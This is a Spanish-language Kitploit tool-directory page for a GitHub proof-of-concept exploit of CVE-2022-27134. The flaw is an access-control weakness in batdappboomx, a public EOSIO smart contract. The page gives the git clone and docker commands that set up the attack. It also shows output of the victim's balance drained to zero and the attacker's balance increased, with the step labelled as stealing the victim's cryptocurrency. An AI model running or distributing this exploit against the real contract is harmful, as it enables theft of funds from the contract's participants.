Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-batdappboomx — CVE-2022-27134 | Kitploit
Herramientas/GitHubGitHub/kenun99/cve-batdappboomx
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubkenun99/cve-batdappboomx

CVE-batdappboomx

CVE-2022-27134

Ver Repositorio
hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

ID de CVE

CVE-2022-27134

PRODUCTO

batdappboomx es un contrato inteligente público que se ejecuta en la cadena de bloques EOSIO. Este contrato inteligente recompensa a sus participantes con criptomonedas si pagan alguna criptomoneda antes.

Versión

La última versión de este contrato inteligente. El código hash sha256 del contrato inteligente es 1327c04cf4b56183eddb1a897bbebf5a873d3421272b708829a4ed0765bef820 Compruébalo en el explorador de blockchain https://bloks.io/account/batdappboomx.

TIPO DE PROBLEMA

vulnerabilidad de control de acceso

DESCRIPCIÓN

batdappboomx no es de código abierto, pero encontramos una vulnerabilidad con WASAI. Los atacantes pueden unirse a este juego sin pagar nada.

  1. activa el entorno
root@kitploit:~
git clone https://github.com/Kenun99/CVE-batdappboomx.git && cd CVE-batdappboomx
docker build -t localhost/client-eos:eos .
docker run --rm  --network host -it localhost/client-eos:eos
  1. ataca a la víctima y roba su criptomoneda, es decir, EOS
root@kitploit:~
info  2022-03-11T14:28:53.345 keosd     wallet_plugin.cpp:38          plugin_initialize    ]
...
warn  2022-03-11T14:28:53.355 keosd     wallet.cpp:218                save_wallet_file     ] saving wallet to file /root/eosio-wallet/./default.wallet
Creating wallet: default
Save password to use in the future to unlock this wallet.
Without password imported keys will not be retrievable.
saving password to /root/passwd
imported private key for: EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV
[+] victim's balance: 100.00 -> 0.00
[+] attacker's balance: 10000000.00 10000100.00

[+] Attacked successfully. Got more cryptocurrency.
Descargar herramienta